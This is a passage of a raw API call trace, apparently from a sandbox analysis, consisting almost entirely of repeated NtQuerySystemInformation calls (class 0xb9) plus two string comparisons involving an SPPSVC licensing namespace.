NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0230.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0230.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0230.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0230.160] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0230.190] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0230.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0230.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0230.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0230.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0230.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.208] NtQuerySystemInformation (SystemInformationClass=0xb9, 